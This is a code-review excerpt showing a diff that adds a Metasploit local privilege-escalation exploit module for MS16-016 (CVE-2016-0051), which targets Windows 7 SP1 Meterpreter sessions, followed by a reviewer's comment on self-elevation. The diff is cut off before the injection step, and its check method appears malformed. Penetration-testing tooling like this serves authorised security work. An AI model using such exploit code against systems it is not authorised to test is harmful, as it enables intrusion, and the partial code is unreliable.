modules/exploits/windows/local/cve-2016-0051/ms16_016_webdav.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
+      'Description'    => %q{
+        This module elevates the specified session's Meterpreter process privileges to NT AUTHORITY\SYSTEM
+        via the mrxdav.sys vulnerability described by MS16-016.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+           'Tamas Koczka', # Original Exploit
+           'William Webb <william_webb[at]rapid7.com>'  # C port and Metasploit module
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP1', { } ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2016-0051' ],
+          [ 'MSB', 'MS16-016'  ],
+          [ 'URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051' ]
+        ],
+      'DisclosureDate' => 'Feb 09 2016',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    # We're simply going to elevate the Meterpreter process' privileges
+    process = client.sys.process.open
```

Comment:
I can see arguments for and against self-elevation, same goes for new sessions. Perhaps what we should be doing is providing an option for the user to decide? That's obviously outside of the scope of this PR, but probably worth discussing elsewhere. I'll open up an issue to keep the conversation going.